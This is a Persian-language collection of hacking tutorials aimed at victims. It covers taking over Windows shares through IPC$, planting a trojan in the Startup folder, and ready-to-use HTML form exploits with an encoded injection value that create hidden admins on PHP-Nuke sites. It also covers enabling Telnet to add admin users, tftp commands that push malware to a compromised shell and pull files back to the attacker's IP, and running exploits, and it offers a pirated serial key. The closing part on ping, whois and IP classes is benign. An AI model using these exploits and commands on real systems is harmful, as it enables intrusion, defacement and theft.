اگه کمی شانس داشته باشید بدون در خواست User Name و Password درایو Share میشه و این پیغام رو مینویسه: The command completed successfully اما اگه از شما در خواست یوزر نیم و پسورد کرد به جای یوزر نیم کلمه Administrator رو وارد کنید که برای ویندوز XP و 2000 تعریف شده است ( البته معمولا تو یه خط یوزر نیم رو میده ).پسورد هم میتونید با یه برنامه مثل بروتوس( Brutus ) پیدا کنید.
اگه شما درایوی رو Share کرده باشید که ویندوز قربانی هم تو همون درایو نصب شده باشه ، می تونید سرور یک تروجان رو تو پوشه Startup تو قسمت Start Menu کپی کنید و منتظر باشد قربانی ریستارت کنه تا فایل سرور اجرا شه و شما به راحتی با تروجان به سیستم وارد بشید. ( یادتون باشه که سرور رو فقط کپی کنید چون اگه اجرا کنید در واقع تو سیستم خودتون اجرا کردید ) (نويسنده : فرشاد عزيز)
حالا که یک تروجان در ستارت آپ طرف کپی شد و پسورد او را دریافت کردید.....
هر کاربر در هنگام ثبت نام در هر تالاری در سایت های نوک باید به اجبار ایمیلی برای خود انتخاب کند که پسورد انتخاب شده به آن ایمیل ارسال شود. ایم خودش یک باگ امنیتی هست و لازم نیست که حتما اکسپلویتی جولوی شما باشد! (ولی بعد از این روش با اکسپلویتی برای هک نوک هک آشنا می شوید)خوب به قسمت (رمزعبور را فراموش کردم) یا ( Forget PassWord ) بروید و ایمیل طرف را وارد تا پسورد فرستاده شود. (این عمل در صورتی اتفاق می شود که نام کاربری بوسیله ی یک ایمیل پشتیبانی شود که در اغلب فروم ها اینجوری هست) حالا که پسورد کاربر مدیر و یا همان شناسه مدیر را گرفتید به منطقه ی کنترل (کنترل پانل) نفوذ کنید و شناسه ی حای را پاک کرده و شناسه ای بسازید و index را عوض کنید. قبل از اینکه ورود به کنترل پانل را به شما یاد دهیم بهتر استروش دیگری برای ساخت ادمین مخفی ( hide admin ) یاد بگیریم! اول باید بفهمیم که نوک چیست؟
پی اچ پی نوک انواع مختلفی دارد که از سال ۲۰۰۱ به ورژن های مجانی تبدیل شد و برای همین شهرت زیادی پیدا کرد در ابتدا تیم های آمریکایی و پاکستانی ورزن های ۶.۸ . ۶.۹ را مجانی کردند و ایرانی های عزیز نیز برای هموطننانشان از ورژن ۷.۳ تا ۷.۸ (آخرین نسخه) را ترجمه کردند و نوک های فراسی را بوجود آوردند. مثل گروه معروف IranNuke
این اکسپلویت هم به شما کمک می کند که در کنترل پانل سایت نوک وارد شوید و شناسه ی مدیرتی برای خود بسازید. این اکسپولیت برای نوک ۷.۳ تا ۷.۷ هست و نوک ۷.۸ را فقط اگر روی لکال هاست باشد هک می کند.
خوب در قسمتی از کد نوشته شده: http://www.sitename.com/admin.php
به جای sitename نام سایت را بنویسید و آن را با پسوند html ذخیره سازید.
به این صورت : exploit.html
حالا روی آن کلیک کنید و صفحه ای همانند صفحه ی عضویت در آن تالار باز می شود! (حالا بستگی دارد که چه چیز هایی از شما درخواست کند) حالا آن را که پر کردید در زیر آن Create Admin را کلیک کنید و مستقیما به http://www.sitename.com/admin.php میرید و اونجا با یوزری (شناسه ایی) که ساختید وارد شوید! حالا شما هم سایت پی اچ پی نوک هک کردید!
موفق باشید
آموزش هك سايتهای Php Nuke [آموزش تلنت ]
خیلی ها دوست دارن سایت هک کنن ولی به علتهای مختلف یا نمیتونن وقت بزارن روش یا سایت امنیتش بالاست یا فرد دانش هک کردن رو نداره و...
به نظر من ساده ترین راه هک کردن و دیفیس کردن سایتها استفاده از باگ های phpnuke هست که به شما اجازه میده به ساده ترین راه به سایت نفوذ کنید..
من برای شما دوستان میخوام چند تا باگ جدید رو بزارم تا ازشون استفاده کنین.
برای شروع به گوگل برید (www.google.com) و بعد باید دنبال سایت هایی که از سیستم phpnuke استفاده میکنن بگردید , شاید بگید چه جوری؟
برای این کار کافیه این نوشته رو کپی و پیست کنید.
كد:
modules.php?name=Downloads
این ماژول در تمامی ورژن های php nuke وجود داره.
خوب بعد از این کار گوگل کلی سایت که از سیستم phpnuke استفاده میکنن میاره
برید رویه یکی از لینکها کلیک کنید وقتی سایت باز شد باید ببینید که شاخه phpnuke چیه
ممکنه به این شکلها باشه:
كد:
http://www.sitename.com/phpnuke/mod...?name=Downloads www.sitename.com/html/modules.php?name=Downloads http://www.sitename.com/portal/modu...?name=Downloads www.sitename.com/modules.php?name=Downloads
برای اینکه بتونیم از این روش سایتها رو هک کنیم باید فایل admin.php رو سایت باشه
برای اینکه بدونین هست یا نه
كد:
modules.php?name=Downloads
اینو پاک کنین و جاش بنویسید admin.php
مثلآ:
كد:
www.sitename.com/admin.php
اگه صفته وارد کردن نام کاربری و پسورد اومد یعنی وجود داره و اگه هم با Error برخورد کردید معلوم میشه که مدیر سایت فایل admin.php رو برداشته.
اگه admin.php بود که به مرتله بعدی میرید اگر هم نبود اون سایت رو بی خیال شید.
خوب تالا ما فرض میکنیم که admin.php وجود داره.
من به شما چند تا باگ میدم که از طریق اونا شما بتونین به سیستم مدیریت سایت نفوذ کنید و به راتتی بتونین سیستم مدیریت سایت رو به دست بگیرید.
شما برای اجرای این کد ها Notepad رو باز کنید کد رو داخلش بنویسید و از منویه File گزینه Save As.. رو انتخاب کنید و هر کجا که میخواین با نام دلخواه تون Save کنید البته بعد از اینکه نام فایل رو نوشتید پسوند اونو .HTML بزارید.
بعد فایلتونو داخل Notepad باز کنید و به جای [sitename] آدرس سایتی رو که میخواین هک کنین رو بنویسید.
کد اول: با استفاده از این میتونین داخل سایت یه کاربر با امکانات ادمین سایت ایجاد کنید و سپس
وارد سیستم مدیریت سایت بشید و سایت رو هک کنید.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> USERNAME: <input type="text" name="add_aid"><br> NOME: <input type="text" name="add_name"><br> PASSWORD: <input type="text" name="add_pwd"><br> E-MAIL: <input type="text" name="add_email"><br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"><br> <input type="hidden" name="add_radminsuper" value="1"><br> <input type="hidden" name="op" value="AddAuthor"></p> <input type="submit" name="Submit" value="Create Admin"><br> </form>
کد دوم: با این کد میتونین یه خبر رو بدونه ورود به سیستم مدیریت به سایت بفرستید.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="add_title"> <br> CONTENT: <textarea name="add_content" rows=10 cols=50></textarea> <br> DATE: <input type="text" name="add_mdate"> <br> E-MAIL: <input type="text" name="add_expire"> <br> <input type="hidden" name="add_expire" value="0"> <br> <input type="hidden" name="add_active" value="1"> <br> <input type="hidden" name="add_view" value="1"> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="addmsg"> </p> <p> <input type="submit" name="Submit" value="Post this message"> <br> </p>
کد سوم: این کد هم تقریبآ مثل کد بالا عمل میکنه.
كد:
<form name="mantra" method="POST" action="http://www.sitename.com/admin.php"> <p>TITLE: <input type="text" name="title"> <br> CONTENT: <textarea name="content" rows=10 cols=50></textarea> <br> <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox"> <br> <input type="hidden" name="add_radminsuper" value="1"> <br> <input type="hidden" name="op" value="massmail_send"> </p> <p> <input type="submit" name="Submit" value="Send to target site newsletter"> <br> </p> </form>
خوب اینم از آموزش هک کردن سایتهای popnuke از این روش
امیدوارم به کارتون بخوره
راستی اگه می خواین سایت های ایرانی که از php nuke استفاده می کنند را پیدا کنید کافیه
به googleبرید و عبارت Farsi project by PHP-Nuke را بنویسید .
آموزش هک ويندوز2000.nt.xp
يكي از مشكلات بزرگ ويندوز كه در Service pack هاي ويندوز هم وجود داره IPC هست
حالا ما با استفاده از اين روش كارمون را شروع ميكنيم .
يكي از نرم افزار هاي مورد نياز GFI:LANguard Security Scaner هست كه بخاطر قدرت و كارايي اين برنامه را پيشنهاد ميكنم كه فقط بايد يكسري
تغييرات رو روي آن انجام بدين اين برنامه را از سايت زير داونلود كنيد:
http://www.kyzj.com
Serial:6J7FF-OL03J-9OHQB-1Q0XZ-F7PLZKH5TY-K1GSN-7BT5F-78A0B-CSKYU
البته ورژن 3.3 هم هست ولي من ورژن 3.2 را پيشنهاد ميكنم كه در سايت بالا ورژن 3.2 وجود دارد و سريال بالا نيز مربوط به همين ورژن هست
حالا بايد يكسري تغييرات در اين برنامه بديم .
1.option را انتخاب كنيد و به قسمت Scanning برويد و اين شاخه را انتخاب كنيد Configure ports و حالا در قسمت
Port number/range:1025
port desciription:network blackjacket
و حالا ADD PORT را بزنيد .
در قسمت New scan بايد يك Range اي پي رو اسكن كنيد تا يك اي پي با مشخصات زير پيدا شود
پرت هاي باز 1025,139 را داشته باشد .
IPC share نيز داشته باشد
حالا بايد به اين اي پي به صورت زير كانكت شويد :
1.در قسمت Run اين جمله را وارد كنيد CMD
2. دستور زير را وارد كنيد :
Net use IpadressIPC$""/user:Administrator
اگر دستور زير را دريافت كردين
Successfully The Command was completed
از اي پي مورد نظر Share گرفتين و در اختيار شماست اما در غير اينصورت Share داراي پسوورد ميباشد كه من براي كرك كردن پسسوورد از اين برنامه
استقاده ميكنم :
PQWAK
كه اين برنامه رو از سايت Download.com دريافت كنيد .
بعد از كرك از پسوورد بدست آمده اينگونه استفاده كنيد
Net use ipadressIPC$ "password"/user:administrator
در صورتيكه ميخواهيد با Telnet كانكت شويد مراحل زير را طي كنيد .
در قسمت RUN تايپ كنيد Regedit
به اين آدرس برويد HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0NTLM
حالا Value date اين فايل رو به اين جمله تغيير دهيد : 21
در قسمت بعدي به RUN برويد و اين دستور را تايپ كنيد TELNET
دستور زير را وارد كنيد Telnet ipadress
در ادامه اگر از شما يوزر و پسوورد خواست يوزر را Administrator و پسسورد را خالي بگذاريد
حالا احتياج به ساختن يك يوزر براي خود داريد . اين دستور را در ادامه وارد كنيد :
Net user username password/add
حالا براي قرار دادن يوزر خود در گروه ادمين ها اين دستور را وارد كنيد
Net groups Administrators username/add
تمام شد شما به هدف خود رسيده ايد اما من براي تازه كارها روش اول را پيشنهاد ميكنم
ولي دوستان ديگر ميتوانند از Telnet استفاده كنند
نكته : من هيچ مسئوليتي در مورد تغيير رجيستري نميپذيرم اگر شما قادر به Edit رجيستري نيستيد بهتره از آن يه Backup تهيه كنيد يا
در نهايت از روش اول استفاده كنيد
وقتی که ما از یک Server و یا یک Client با استفاده از باگ آن (بطور مثال Lsass ,Dcom ,IIS ,Apache,Mysql ,...) یک سطح دسترسی (Shell ) می گیریم می تونیم اونجا مثل Command pormpt سیستم خودمون کارائی انجام بدیم و لی برای ارسال و دریافت فایل باید از tftp استفاده کنیم .کلاینت این برنامه در شاخه ی System32 همه ی سیستم عامل های windows هستش و شما می تونید با اجرا کردن tftp در سیستم خودتون نقش Server رو بازی کنید و چون به کلاینت اون دسترسی دارید بهش دستور ارسال و دریافت از Server تون که تو سیستم شما در حال اجراست رو بدید (یک ارتباط Client & ُServer ای )
ارسال و دریافت فایل در TFtp با Shellمی تونید ip خودتون رو اونجا ببینید اگه اولش 192 داشت یا به بیانی Unvalid بود برین اینجاو ip valid خودتون رو ببینید چون به این ip احتیاج داریم .بعدش دکمه ی Browse رو تو tFtp بزنید و به طور مثال دایرکتری Desktop رو بهش بدید و بعدش show Dir رو تو برنامه بزنید و فایلی رو که میخواین به سیستم طرف انتقال بدین رو انتخاب کنید مثلآ Server.exe
خوب حالا برید تو shell ای که ازش گرفتین و به tFtp اون دستور بدید که Server.exe رو بگیره برای این کار از این دستور استفاده کنید Tftp -i 62.32.45.67 get server.exe که این ip همون ip ای هستش که از تو سایت گرفتیم (ip خودتون) دستور get برای اینه که به tFtp اون بگه فایل رو بگیره . شما در هر دایرکتری در سیستم طرف که باشید این فایل همون جا کپی مس شه و تو shell مینویسه Transfer Successful
حال برای اینکه بتونیم فایلی رو از سیستمش بگیریم باید بریم تو همون شاخه ای که اون فایل هست تو shell بعد اونجا بنویسیم
tFtp -i 62.32.45.67 post aks.jpg با این دستور فایل ( عکس و برنامه و ..) رو که از سیستم اون برای شما می فرسته که درصد فایل های ارسالی و دریافتی تو tFtp قابل مشاهده هستش
این روش ارسال و دریافت رو برای شلی که با iRcHaTaN Ps 7.1 از سیستم قربانی میگیدید هم میتونید استفاده کنید
برای ارسال: Tftp -i 62.32.45.67 get server.exe
برای دریافت: Tftp -i 62.32.45.67 post server.exe
اکسپلويت چيست
پاورقي:همونطوری که می دونیم به هر کاراکتر یک عدد که شامل 0و1 است اختصاص داده میشه کدهای اکسپلویت از این قانون اطاعت می کنند. برای تبدیل اینا به زبون صفرویک که تو رایانه شما استفاده میشه از مترجم استفاده میشه که همون IIS است (درواقع این کلمه همون internet information services خودمونه !)
ببينيد براي متوجه شدن اين مفهوم بايد با آسيب پذيري ها يا Vulnerability ها آشنايي داشته باشيد . فكر كنيد كه شما مي خواهيد به فولدر يك وب سايت كه سرور آي-آي-اس بر آن نصب شده است با استفاده از باگ Unicode دسترسي پيدا نماييد و نياز به ارسال تعدادي درخواست به سرور هستيد( البته اين كار جهت هكر هاي خبره مانند استفاده از ماشين حساب در انجام عمليت رياضي است) .
چگونه مي توان از آن استفاده كرد ؟
كدهاي اكسپلويت رو كامپايل كنيد(نمونه كدهاي اكسپلويت در سايت موجود است) بعد از كامپايل كردن يه خط فرمان به شما ميده يا يه پوشه به نام read me كه دستوراتي كه ميشه از اون اكسپلويت استفاده كرد رو توش نوشته ..براي اجراي اكسپلويت هم شما بايد مسير اونو درcommand سيستم مشخص كنيد و با استفاده از دستورات خود اكسپلويت و آي پي هدف به اون سايت وصل بشين البته اين رو هم بگم شما اول بايد سايتي كه ميشه از طريق اون اكسپلويت ازش Share اشتراك گرفت رو پيدا كنيد ...
كامپايل اكسپلويت
شما از طريق دو سيستم عامل لينوکس و ويندوز می توانيد اکسپلويت های خود را کامپايل کنيد . توصيه من لينوکسه چون اکثر اکسپلويت ها در اون کامپايل ميشن ولی در ويندوز چون بعضی از هدر ها رو شامل نمی شه نميشه همه اکسپلويت ها رو کامپايل کرد .
كامپايل اكسپلويت تحت ويندوز:
برای کامپایل کردن اکسپلویت های C در ویندوز می تونید از ++Visual C و Lccwin و ++Borland C استفاده کنید (برنامه پيشنهادي من)
بعد از كامپايل اكسپلويت بايد اونو اجرا کنيد . و شما نمی تونيد اونو با کليک کردن اجرا کنيد چون باز نميشه برای اينکار بايد اکسپلويت کامپايل شده را در دايرکتوری ويندوزتون در يك پوشه اي کپی کنيد . و بعد به منوی استار رفته و روی گزينه Run کليک کنيد و سپس تايپ کنيد :
کد:
cmd
حالا command prompt باز شده حالا بايد اسم اکسپيويتتون رو تايپ کنيد بطور مثال :
کد:
lsas.exe
اکسپلويت هم نحوه کار رو داخل همون داس ويندوز توضيح می ده که اگه يه کم زبان بلد باشين می فهميد . مثلا همين اکسپلويت بالا. با نوشتن ای پی و يک پورت انتخابی مثل ۶۶۶۹ يا ۵۲۷۷ .نوع سيستم عامل طرف رو به شما می ده و اگر سيستم طرف ويندوز سری ان تی قديمی ( مثلا ماله پارسال ) باشه به پورتی که شما دادين حمله می کنه و کاری می کنه که شما می تونيد با يه تلنت به اون پورت به شل ( Shell) سيستم قربانيتون برسيد .
كامپايل اكسپوليت تحت لينوكس:
برای کامپایل کردن اکسپلویت های C در لینوکس می تونید از کامپایلر GCC استفاده کنید
براي كامپايل اكسپلويت در لينوكس به قسمت Shelle ميريم و با دستور زير
کد:
Gcc – O Exploit Name
اكسپلويت كامپايل ميشه و براي اجراي اون هم از دستور زير استفاده ميكنيم
کد:
/.
نکته:اکسپلویت هایی که تحت لینوکس هستند دارای انکلود* هستند و از طریق همین انکلود هست که ما متوجه میشیم که این اکسپلویتها برای سیستم عامل لینوکس نوشته شده است
انکلود*:مجموعه ای است از تعاریف دستوراتی که برنامه نویس در برنامه اش از آن استفاده می کند
برای اجرا کردن اکسپلویت های پرل در محیط های ویندوز و لینوکس هم تنها به برنامه Active Perl احتیاج دارین
چگونه به يک پورت Telnet کنيم؟
براي اينکه عملکرد يک پورت براي شما روشن شود، بايد به آن پورت Telnet کنيد. (البته معمولا تعدادي از پورتهايي را که ممکن است اطلاعاتي مهم را در اختيار هکرها قرار دهند مثل پورت ?? معمولا بسته است و ارتباط با آنها شايد برقرار نشود.) براي telnet کردن در command prompt دستور زير را تايپ کنيد:
telnet hostname portnum
در اين دستور بهجاي hostname شماره ip و يا نام سايت را وارد ميکنيد و بهجاي portnum شماره پورت و يا معادل آن از جدول. مثلا براي تلنت کردن به پورت ?? که ساعت و تاريخ را بهدست ميدهد در کامپيوتري به اسم http://www.iums.ac.ir/ مينويسيد:
telnet iums.ac.ir 13
telnet iums.ac.ir daytime
هر دو اين دستورات معادل هم هستند.
تلنت کردن معمولا اولين کاري است که يک هکر براي هک کردن يک سايت انجام ميدهد، زيرا بعضي از پورتها در صورت بسته نبودن روي آن سرور، معمولا حاوي اطلاعات بسيار مهمي هستند.
همين الان شروع کنيد و مثل يک هکر واقعي به کامپبوترهاي مختلف و پورتهاي گوناگون تلنت کنيد. مخصوصا اگر پورت ?? (finger) روي يک کامپيوتر باز بود، مرا هم خبر کنيد
تقسيمبندي انواع حملات
اولين نکتهاي که لازم است بگويم اينه که وقت خود را براي هک کردن کامپيوترهاي کلاينت هدر ندهيد (اگرچه براي افراد مبتدي کار با نرمافزاري مثل Sub7 زياد هم بد نيست ولي نبايد زيادهروي کرد) علت هم اينه که هربار که به اينترنت وصل ميشوند ip جديدي به آنها اختصاص پيدا ميکنه و زحماتتون هدر ميره (البته براي جلوگيري از اين امر هم روشهايي هست که در آينده ايشالله ميگم).
حالا تقسيمبندي:
?- حمله به روش Denial of Service Attack) DoS)
?- حمله به روش Exploit
?- حمله به روش Info Gathering (تلنت کردن يکي از مثالهاي آن است که امروز آموختيد)
?- حمله به روش Disinformation
در مورد هرکدام بهزودي توضيح ميدم. C,Linux,TCP/IP يادتون نره
ترسيم مسير براي آينده
?- اولين و مهمترين تصميم انتخاب نوع کامپيوتري است که ميخواهيد هک کنيد ( کلاينت يا سرور )، زيرا روشهک کردن ايندو بجز در مراحل ابتدايي کاملا متفاوت است.
?- دومين گام انتخاب يک کامپيوتر مشخص (مثلا کامپيوتري که فلان سايت را نگه ميدارد که مثالي براي کامپيوتر سرور است و يا کامپيوتر فلان شخصي که با او چت ميکنيد که مثالي براي کامپيوتر کلاينت است) و جمعآوري اطلاعات در مورد آن است. اين جمعآوري اطلاعات از قرباني (Victim) را Footprinting گويند. اولين مشخصهاي که بايد کشف شود، ip اوست. يکي ديگر از اطلاعات مهم که معمولا دنبالش هستيم، پيدا کردن نوع سيستمعامل و نيز برنامههايي است که کامپيوتر شخص از آنها بهره ميبرد. يکي از مهمترين ( و گاه خطرناکترين) کارها، تستکردن پورتهاي آن کامپيوتر براي ديدن اينکه کدام پورتها باز و کدامها بسته هستند.
?- مرحله بعدي در واقع شروع تلاش براي نفوذ به سيستم است. اين نفوذ سطوح مختلف دارد و بالاترين آن که در کامپيوترهاي سرور روي ميدهد، حالتي است که بتوان username و password مربوط به مدير کامپيوتر (administrator) يا superuser را بهدست آورده و از طريق اين Shell Account به نهايت نفوذ دست يابيم ولي گاه بهدلايل مختلف (مربوط به سطح علمي خود و ... ) نميتوان به اين سطح دستيافت اما به هر حال براي مرحله بعدي ميتواند استفاده شود. اين مرحله جايي است که هنر شما يه عنوان يک هکر آغاز شده و نيز به پايان ميرسد.
?- اين مرحله بعد از نفوذ روي ميدهد که در آن به يک سطحي از کنترل سيستم رسيدهايد. رفتار شما در اين مرحله مشخص ميکند که چه نوع هکر هستيد(سامورايي، واکر و يا کراکر) و اينکه آيا جنبه ياد گرفتن را داشتهايد يا نه، همينجا مشخص خواهد شد.
?- مرحله آخر پاک کردن ردپاست تا گير نيفتيم (البته بعضي وقتها براي کلاس گذاشتن بايد گير بيفتيم، هه هه ...). بعضي از سيستمها آمار login را نگه ميدارند که در مورد آنها اين مرحله بسيار مهم است.
خلاصه مطالب بالا به اين صورت است:
Selection -> FootPrinting -> Penetration -> [Changings] -> Cleaning
----------------------------------------------------------------------------------------------------------------------------------
شروع مبحث Footprinting
گفتيم که اولين مرحله جمعآوري اطلاعات است که به آن FootPrinting ميگويند. اين مبحث را با آموزش روش پيدا کردن ip شروع ميکنيم.
-----------------------------------------------------------------------------------------------------------------------------------
پيدا کردن ip يک سايت با دانستن آدرس اينترنتي آن (پيدا کردن ip سرور)
قبل از اين بحث بگم که براي پيدا کردن آي پي افراد بايد به مبحث نت استت برسيم بعدش !
براي اين کار روشهاي مختلفي هست:
?- در (Internet Explorer (IE آدرس را تايپ کنيد و Enter را فشار دهيد. در قسمت پايين مرورگر يعني Status Bar پس از چند لحظه براي مدت کوتاهي ip نمايش داده ميشود و ميتوانيد آنرا يادداشت کنيد. اگر طول اين مدت بسيار کوتاه است ميتوانيد از صفحه عکس بگيريد ( با دکمه Print Screen ) و در يک نرمافزار گرافيکي بعد از باز کردن يک صفحه خالي به کمک Ctrl+V آنرا مشاهده کنيد. [ عجب راه احمقانهاي ;-)
اگر اين کار را براي http://www.yahoo.com/ انجام دهيم: پايين اينترنت اکسپلرر اعدادي مي بينيم که همان شماره ip براي http://www.yahoo.com/ است.
نکته بسيار مهم اين است که بهدليل ضريب اشتباه بسيار بالاي آن هيچگاه از اين روش استفاده نکنيد. نتايج ممکن است کاملا اشتباه باشد که بعدا ميگم چرا.
?- دستور ping را در command prompt صادر کنيد:
ping domain
در اين حالت ميتوانم ip آن سايت را ملاحظه کنم. (البته کار اصلي ping يک چيز ديگست و ميشه گفت داريم ازش سوءاستفاده ميکنيم). مثلا براي پيدا کردن ip سازين مينويسم:
ping Ksn.4t.com
و جواب ميشنوم:
Pinging ksn.com [63.148.227.65] with 32 bytes of data:
Reply from 63.148.227.65: bytes=32 time=821ms TTL=111
Reply from 63.148.227.65: bytes=32 time=821ms TTL=111
Reply from 63.148.227.65: bytes=32 time=822ms TTL=111
Reply from 63.148.227.65: bytes=32 time=811ms TTL=111
Ping statistics for 63.148.227.65:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 811ms, Maximum = 822ms, Average = 818ms
ملاحظه ميفرماييد که ip سايتم 63.148.227.65 است.
اگر دستور ping را بهجاي ksn.4t.com براي http://www.ksn.4t.com/ صادر کنيد، جواب همان است. البته براي سايتهاي بزرگ جوابهاي حاصل متفاوت خواهد بود.
?- روش بعدي و کاملترين روش whois کردن به بعضي سايتهاي خاص است. بعدا اين را کاملتر توضيح ميدم ولي فعلا روشش رو ميگم. آدرس زير را در مرورگر خود تايپ کنيد:
http://www.samspade.org/t/ipwhois?a=xxxxxx
که بهجاي xxxxxx آدرس مورد نظر را تايپ کنيد. مثلا براي ksn.com يکي از دو آدرس زير را بايد تايپ کرد:
http://www.samspade.org/t/ipwhois?a=ksn.4t.com
http://www.samspade.org/t/ipwhois?a=www. ksn.4t.com
چيزي که در صفحه ظاهر ميشود به صورت زير است:
whois -h magic 63.148.227.65
ksn.com resolves to 63.148.227.65
Trying whois -h whois.arin.net 63.148.227.65
Qwest Communications NET-QWEST-BLKS-2 (NET-63-144-0-0-1)
63.144.0.0 - 63.151.255.255
Neutron Digital Media Corp. QWST-63-148-224 (NET-63-148-224-0-1)
63.148.224.0 - 63.148.231.255
# ARIN Whois database, last updated 2002-09-04 19:05
# Enter ? for additional hints on searching ARIN's Whois database.
که آدرس ip در سطر اول و دوم ذکر شده است.
اگر دو روش آخر را براي سايت بزرگ yahoo انجام دهيم، نتايج زير را ميبينيم:
--> روش ping :
http://www.yahoo.com/ ====> 64.58.76.229
yahoo.com ====> 66.218.71.198
--> روش whois :
...و http://www.yahoo.com/ ====> 66.218.71.86
64.58.79.230 و yahoo.com ====> 66.218.71.198
نتايج حاصل گوياي آن است که چرا بهتر است از whois استفاده کنيم.
-----------------------------------------------------------------------------------------------------------------------------------
? RFC چيست؟
متون بسيار کامل ولي خشک و ثقيل که در مورد مفاهيم مختلف شبکه بحث ميکنند. اين فايلها به صورت متني و با پسوند txt هستند و بهعنوان مرجع (براي مراجعه و نه مطالعه کامل) کاربرد دارند. اين فايلها يکبار منتشر شده و هرگز تغيير داده نميشوند (حتي اگر حاوي اشتباه باشند.)
-----------------------------------------------------------------------------------------------------------------------------------
فايلهاي RFC از کجا قابل دسترسي هستند؟
RFCها از سايتهاي بسياري قابل دسترس هستند ولي سايت مورد علاقه من براي RFCها، سايت زير است:
http://www.ietf.org/rfc/xxxxxxx.txt
که بهجاي xxxxxxx نام rfc موردنظر را مينويسيم. مثلا براي دسترسي به rfc791 بايد آدرس را به صورت زير تايپ کنيم:
http://www.ietf.org/rfc/rfc791.txt
----------------------------------------------------------------------------------------------------------------------------------
تقسيم بندي آدرسهاي ip
آدرسهاي ip به ? کلاس تقسيمبندي ميشوند که A تا E نام دارند ولي از اين بين سه کلاس اول (يعني C,B,A) کاربرد عملي دارند که آنها را شرح ميدهيم:
?- کلاس A: اگر ip را بهصورت xxx.yyy.yyy.yyy در نظر بگيريد، اين کلاس تمام ipهايي را شامل ميشود که xxx بين ? تا ??? است. اين کلاس ويژه backbone هاي بزرگ اينترنتي است و در هنگام ثبت domain براي گرفتن ip از آنها استفاده ميشود. بنابراين اکثر سايتها چنين ipهايي دارند. اين کلاس را 8/ هم ميگويند.
?- کلاس B: اين کلاس تمام ipهايي را شامل ميشود که xxx بين ??? و ??? است. اين کلاس هم از جمله کلاسهاي پرکاربرد است. اين کلاس را 16/ هم ميگويند.
?- کلاس C: اين اين کلاس تمام ipهاي را شامل ميشود که xxx بين ??? و ??? است. اين کلاس معمولا به ISP هايي که خدمات dial-up ارائه ميدهند، تعلق ميگيرد (اين جمله چندان مستند نيست.). بنابراين اگر بهصورت dial-up به اينترنت متصل شويد، چنين ip ميگيريد. اين کلاس را 24/ هم ميگويند.
سوالي که پيش ميآيد اين است که xxx چرا نه در کلاس A و نه در B، عدد ??? را شامل نميشود؟ جواب اين است که ??? براي کامپيوتر خودمان رزرو شده است. مثلا 127.0.0.1 معمولا يعني localhost يعني خودمان.
----------------------------------------------------------------------------------------------------------------------------------
? بهدست آوردن ip خودتان بعد از اتصال به اينترنت
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 217.66.198.116
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . : 217.66.198.116
که آدرس ip تان را ميتوانيد در سطر Ip Address ببينيد. (مسئله پروکسي را فعلا ناديده بگيريد)
?- بعد از اتصال به اينترنت حداقل يک صفحه باز کنيد و بعد دستور netstat -n را در command prompt تايپ کنيد. من با تايپ اين دستور به نتايج زير رسيدم:
Active Connections
Proto Local Address Foreign Address State
TCP 217.66.198.116:2469 64.58.76.177:80 ESTABLISHED
TCP 217.66.198.116:2471 66.163.175.130:80 ESTABLISHED
TCP 217.66.198.116:2473 212.73.194.143:80 ESTABLISHED
TCP 217.66.198.116:2474 212.73.194.143:80 ESTABLISHED
TCP 217.66.198.116:2476 212.73.194.136:80 SYN_SENT
ستوني که زير عبارت Local Address قرار دارد، ip من در آن اتصال است. بنابراين ip من در آن اتصال 217.66.198.116 بوده است.
----------------------------------------------------------------------------------------------------------------------------------
ادامه مبحث Footprinting براي سرورها!
قبلا بحث را با روش پيدا کردن ip سرورها (سايتها) شروع کرديم. حالا کمي در مورد whois ميآموزيم. لازم به ذکر است که هنوز درمورد FootPrinting کلاينتها صحبتي نکرده و نميکنم.
----------------------------------------------------------------------------------------------------------------------------------
Whois چيست؟ ( مهمه )
تعريف کلي براي whois نميتوان ارائه داد ولي فعلا منظور ما از Whois همان کسب اطلاعات در مورد يک سايت است. (قبلا با نوع خاصي از whois براي تبديل domain به ip آشنا شدهايد).
کاري که امروز ميخواهم انجام دهم کسب اطلاعات در مورد يک شماره ip و يا يک domain (مثلا irib.com ) خاص است. براي کسب اين اطلاعات بايد به اينترنت وصل شده و بهطريقي به يک سري سايتهاي خاص که وظيفه ثبت domain , ... را دارند متصل شده و اطلاعات را از آنها درخواست کنم. اين سايتهاي خاص database (بانکهاي اطلاعاتي) ويژه اين وظايف را دارند. براي کسب اين اطلاعات از سايتها روشهاي زير را ميتوان بهکار برد:
?- اگر از طريق سيستم عامل يونيکس يا لينوکس به اينترنت وصل شدهايد، دستوري به اسم whois در آنها وجود دارد. و يا ميتوانيد از نرمافزارهاي خاصي که براي اين سيستمعاملها وجود دارد (مثل Xwhois ) استفاده کنيد. ولي فعلا بحث روي ويندوز است و اين دستور در ويندوز وجود ندارد.
?- براي whois کردن در ويندوز نرمافزارهاي زيادي وجود دارد (که به زودي نوشتن يک whois متوسط را در زبان C ياد خواهم داد.) از مشهورترين اين نرمافزارها Netscan tools و SamSpade است. ولي از اينها هم فعلا صرف نظر ميکنم تا شما بيشتر با جزئيات اين کار آشنا شويد.
?- روشي که ما در اين جلسه به کار ميبريم، استفاده از سايتهايي است که اين جستجو را براي ما انجام ميدهند. بحث را شروع ميکنم:
اولين سايت مشهورترين سايت ثبت domain براي org , net , com است.
